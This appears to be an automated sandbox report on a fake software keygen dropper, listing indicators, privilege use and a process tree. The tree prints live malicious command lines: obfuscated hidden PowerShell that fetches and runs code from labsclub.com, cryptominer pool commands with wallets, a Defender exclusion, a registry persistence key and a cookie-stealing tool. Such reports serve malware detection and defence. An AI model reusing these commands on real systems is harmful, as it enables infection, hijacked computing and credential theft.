fa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 6 IoCs
pid Process 1456 PING.EXE 5468 PING.EXE 3968 PING.EXE 4320 PING.EXE 8476 PING.EXE 9636 PING.EXE -
Script User-Agent 12 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 386 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 784 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 903 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1229 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1242 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 139 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 378 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 897 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1120 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1128 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 154 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 761 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 3904 setups.tmp 3904 setups.tmp 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe 2428 multitimer.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 3480 Setup.exe Token: SeCreateTokenPrivilege 1760 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 1760 askinstall20.exe Token: SeLockMemoryPrivilege 1760 askinstall20.exe Token: SeIncreaseQuotaPrivilege 1760 askinstall20.exe Token: SeMachineAccountPrivilege 1760 askinstall20.exe Token: SeTcbPrivilege 1760 askinstall20.exe Token: SeSecurityPrivilege 1760 askinstall20.exe Token: SeTakeOwnershipPrivilege 1760 askinstall20.exe Token: SeLoadDriverPrivilege 1760 askinstall20.exe Token: SeSystemProfilePrivilege 1760 askinstall20.exe Token: SeSystemtimePrivilege 1760 askinstall20.exe Token: SeProfSingleProcessPrivilege 1760 askinstall20.exe Token: SeIncBasePriorityPrivilege 1760 askinstall20.exe Token: SeCreatePagefilePrivilege 1760 askinstall20.exe Token: SeCreatePermanentPrivilege 1760 askinstall20.exe Token: SeBackupPrivilege 1760 askinstall20.exe Token: SeRestorePrivilege 1760 askinstall20.exe Token: SeShutdownPrivilege 1760 askinstall20.exe Token: SeDebugPrivilege 1760 askinstall20.exe Token: SeAuditPrivilege 1760 askinstall20.exe Token: SeSystemEnvironmentPrivilege 1760 askinstall20.exe Token: SeChangeNotifyPrivilege 1760 askinstall20.exe Token: SeRemoteShutdownPrivilege 1760 askinstall20.exe Token: SeUndockPrivilege 1760 askinstall20.exe Token: SeSyncAgentPrivilege 1760 askinstall20.exe Token: SeEnableDelegationPrivilege 1760 askinstall20.exe Token: SeManageVolumePrivilege 1760 askinstall20.exe Token: SeImpersonatePrivilege 1760 askinstall20.exe Token: SeCreateGlobalPrivilege 1760 askinstall20.exe Token: 31 1760 askinstall20.exe Token: 32 1760 askinstall20.exe Token: 33 1760 askinstall20.exe Token: 34 1760 askinstall20.exe Token: 35 1760 askinstall20.exe Token: SeDebugPrivilege 2428 multitimer.exe Token: SeDebugPrivilege 4368 taskkill.exe Token: SeDebugPrivilege 4248 MicrosoftEdge.exe Token: SeDebugPrivilege 4248 MicrosoftEdge.exe Token: SeDebugPrivilege 4248 MicrosoftEdge.exe Token: SeDebugPrivilege 4248 MicrosoftEdge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4056 setups.exe 3904 setups.tmp 4248 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 1176 wrote to memory of 1452 1176 Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe 79 PID 1176 wrote to memory of 1452 1176 Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe 79 PID 1176 wrote to memory of 1452 1176 Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe 79 PID 1452 wrote to memory of 3700 1452 cmd.exe 82 PID 1452 wrote to memory of 3700 1452 cmd.exe 82 PID 1452 wrote to memory of 3700 1452 cmd.exe 82 PID 1452 wrote to memory of 816 1452 cmd.exe 83 PID 1452 wrote to memory of 816 1452 cmd.exe 83 PID 1452 wrote to memory of 816 1452 cmd.exe 83 PID 1452 wrote to memory of 1300 1452 cmd.exe 84 PID 1452 wrote to memory of 1300 1452 cmd.exe 84 PID 1452 wrote to memory of 1300 1452 cmd.exe 84 PID 1452 wrote to memory of 2012 1452 cmd.exe 85 PID 1452 wrote to memory of 2012 1452 cmd.exe 85 PID 1452 wrote to memory of 2012 1452 cmd.exe 85 PID 3700 wrote to memory of 4064 3700 keygen-pr.exe 86 PID 3700 wrote to memory of 4064 3700 keygen-pr.exe 86 PID 3700 wrote to memory of 4064 3700 keygen-pr.exe 86 PID 2012 wrote to memory of 3480 2012 keygen-step-4.exe 87 PID 2012 wrote to memory of 3480 2012 keygen-step-4.exe 87 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 4064 wrote to memory of 808 4064 key.exe 88 PID 1300 wrote to memory of 3880 1300 keygen-step-3.exe 89 PID 1300 wrote to memory of 3880 1300 keygen-step-3.exe 89 PID 1300 wrote to memory of 3880 1300 keygen-step-3.exe 89 PID 3880 wrote to memory of 1456 3880 cmd.exe 92 PID 3880 wrote to memory of 1456 3880 cmd.exe 92 PID 3880 wrote to memory of 1456 3880 cmd.exe 92 PID 3480 wrote to memory of 2428 3480 Setup.exe 93 PID 3480 wrote to memory of 2428 3480 Setup.exe 93 PID 3480 wrote to memory of 4056 3480 Setup.exe 94 PID 3480 wrote to memory of 4056 3480 Setup.exe 94 PID 3480 wrote to memory of 4056 3480 Setup.exe 94 PID 2012 wrote to memory of 1760 2012 keygen-step-4.exe 95 PID 2012 wrote to memory of 1760 2012 keygen-step-4.exe 95 PID 2012 wrote to memory of 1760 2012 keygen-step-4.exe 95 PID 4056 wrote to memory of 3904 4056 setups.exe 96 PID 4056 wrote to memory of 3904 4056 setups.exe 96 PID 4056 wrote to memory of 3904 4056 setups.exe 96 PID 1760 wrote to memory of 4208 1760 askinstall20.exe 99 PID 1760 wrote to memory of 4208 1760 askinstall20.exe 99 PID 1760 wrote to memory of 4208 1760 askinstall20.exe 99 PID 4208 wrote to memory of 4368 4208 cmd.exe 103 PID 4208 wrote to memory of 4368 4208 cmd.exe 103 PID 4208 wrote to memory of 4368 4208 cmd.exe 103 PID 2428 wrote to memory of 4640 2428 multitimer.exe 464 PID 2428 wrote to memory of 4640 2428 multitimer.exe 464
Processes
-
C:\Users\Admin\AppData\Local\Temp\Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe"C:\Users\Admin\AppData\Local\Temp\Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:808
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:816
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:1456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Users\Admin\AppData\Local\Temp\Y7H1LFHI37\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Y7H1LFHI37\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Users\Admin\AppData\Local\Temp\Y7H1LFHI37\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Y7H1LFHI37\multitimer.exe" 1 3.1617537379.6069a96313de5 1016⤵PID:4640
-
C:\Users\Admin\AppData\Local\Temp\Y7H1LFHI37\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Y7H1LFHI37\multitimer.exe" 2 3.1617537379.6069a96313de57⤵PID:4764
-
C:\Users\Admin\AppData\Local\Temp\mnfukpd2lmy\vict.exe"C:\Users\Admin\AppData\Local\Temp\mnfukpd2lmy\vict.exe" /VERYSILENT /id=5358⤵PID:5188
-
C:\Users\Admin\AppData\Local\Temp\is-GARB2.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-GARB2.tmp\vict.tmp" /SL5="$30200,870426,780800,C:\Users\Admin\AppData\Local\Temp\mnfukpd2lmy\vict.exe" /VERYSILENT /id=5359⤵PID:5528
-
C:\Users\Admin\AppData\Local\Temp\is-ILAN7.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-ILAN7.tmp\win1host.exe" 53510⤵PID:5588
-
C:\Users\Admin\AppData\Local\Temp\hHf7UHqMd.exe"C:\Users\Admin\AppData\Local\Temp\hHf7UHqMd.exe"11⤵PID:6604
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"12⤵PID:7056
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif12⤵PID:5576
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵PID:4672
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:7396
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:9224
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sayduhmku52\o4rsz1dxogy.exe"C:\Users\Admin\AppData\Local\Temp\sayduhmku52\o4rsz1dxogy.exe" /VERYSILENT8⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\is-J9GEQ.tmp\o4rsz1dxogy.tmp"C:\Users\Admin\AppData\Local\Temp\is-J9GEQ.tmp\o4rsz1dxogy.tmp" /SL5="$201FA,2592217,780800,C:\Users\Admin\AppData\Local\Temp\sayduhmku52\o4rsz1dxogy.exe" /VERYSILENT9⤵PID:5544
-
C:\Users\Admin\AppData\Local\Temp\is-RLBT1.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-RLBT1.tmp\winlthsth.exe"10⤵PID:5396
-
C:\Users\Admin\AppData\Local\Temp\eXbR0DO6L.exe"C:\Users\Admin\AppData\Local\Temp\eXbR0DO6L.exe"11⤵PID:6624
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"12⤵PID:4676
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif12⤵PID:6968
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵PID:6572
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:8420
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:5052
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\buhztgxxbvn\iaojiozbyt0.exe"C:\Users\Admin\AppData\Local\Temp\buhztgxxbvn\iaojiozbyt0.exe" /ustwo INSTALL8⤵PID:5164
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "iaojiozbyt0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\buhztgxxbvn\iaojiozbyt0.exe" & exit9⤵PID:6172
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "iaojiozbyt0.exe" /f10⤵
- Kills process with taskkill
PID:6984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uju0xdfk25s\mig5mb54atg.exe"C:\Users\Admin\AppData\Local\Temp\uju0xdfk25s\mig5mb54atg.exe" /quiet SILENT=1 AF=7568⤵PID:5456
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\uju0xdfk25s\mig5mb54atg.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\uju0xdfk25s\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617278286 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5020
-
-
-
C:\Users\Admin\AppData\Local\Temp\ld2y4ytjyus\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\ld2y4ytjyus\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5424
-
-
C:\Users\Admin\AppData\Local\Temp\5fpvzdhuopc\vpn.exe"C:\Users\Admin\AppData\Local\Temp\5fpvzdhuopc\vpn.exe" /silent /subid=4828⤵PID:5412
-
-
C:\Users\Admin\AppData\Local\Temp\2wxqg43vvav\o31c1zcx4hl.exe"C:\Users\Admin\AppData\Local\Temp\2wxqg43vvav\o31c1zcx4hl.exe"8⤵PID:5384
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2wxqg43vvav\o31c1zcx4hl.exe"9⤵PID:5648
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\iq0sdmaqwmw\app.exe"C:\Users\Admin\AppData\Local\Temp\iq0sdmaqwmw\app.exe" /8-238⤵PID:5276
-
-
C:\Users\Admin\AppData\Local\Temp\rfln1k1pfm1\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\rfln1k1pfm1\Setup3310.exe" /Verysilent /subid=5778⤵PID:5216
-
-
C:\Users\Admin\AppData\Local\Temp\k1vdlxj00wd\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\k1vdlxj00wd\cpyrix.exe" /VERYSILENT8⤵PID:5204
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5844
-
C:\Users\Admin\AppData\Local\Temp\1ead012f-d185-4c77-9b92-979eff6396ba\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\1ead012f-d185-4c77-9b92-979eff6396ba\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1ead012f-d185-4c77-9b92-979eff6396ba\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵PID:6092
-
C:\Users\Admin\AppData\Local\Temp\1ead012f-d185-4c77-9b92-979eff6396ba\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\1ead012f-d185-4c77-9b92-979eff6396ba\AdvancedRun.exe" /SpecialRun 4101d8 609211⤵PID:5720
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵PID:4916
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵PID:5728
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:4392
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:1268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5844 -s 198010⤵
- Program crash
PID:5048
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:6148
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:5524
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\GS6XHKMCYR\setups.exe"C:\Users\Admin\AppData\Local\Temp\GS6XHKMCYR\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Users\Admin\AppData\Local\Temp\is-63Q2I.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-63Q2I.tmp\setups.tmp" /SL5="$70154,454998,229376,C:\Users\Admin\AppData\Local\Temp\GS6XHKMCYR\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3904
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4368
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"4⤵PID:4820
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4908
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:5112
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:4940
-
C:\Users\Admin\AppData\Roaming\C7F9.tmp.exe"C:\Users\Admin\AppData\Roaming\C7F9.tmp.exe"5⤵PID:2276
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4288
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:908
-
-
-
C:\Users\Admin\AppData\Roaming\C923.tmp.exe"C:\Users\Admin\AppData\Roaming\C923.tmp.exe"5⤵PID:5016
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\C923.tmp.exe6⤵PID:7704
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:7648
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:5776
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:3968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:5060
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:8600
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:5324
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:8312
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6248
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4248
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4304
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4616
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4276
-
C:\Users\Admin\AppData\Local\Temp\is-78SP9.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-78SP9.tmp\vpn.tmp" /SL5="$40218,15170975,270336,C:\Users\Admin\AppData\Local\Temp\5fpvzdhuopc\vpn.exe" /silent /subid=4821⤵PID:5656
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:6088
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵PID:744
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵PID:6660
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵PID:6140
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵PID:5508
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵PID:8888
-
-
C:\Users\Admin\AppData\Local\Temp\is-V42D2.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-V42D2.tmp\IBInstaller_97039.tmp" /SL5="$201F2,14574507,721408,C:\Users\Admin\AppData\Local\Temp\ld2y4ytjyus\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵PID:5640
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-RFVUA.tmp\{app}\microsoft.cab -F:* %ProgramData%2⤵PID:5992
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-RFVUA.tmp\{app}\microsoft.cab -F:* C:\ProgramData3⤵PID:6128
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=2⤵PID:7908
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"2⤵PID:5668
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f2⤵PID:7596
-
-
C:\Users\Admin\AppData\Local\Temp\is-RFVUA.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-RFVUA.tmp\{app}\chrome_proxy.exe"2⤵PID:3712
-
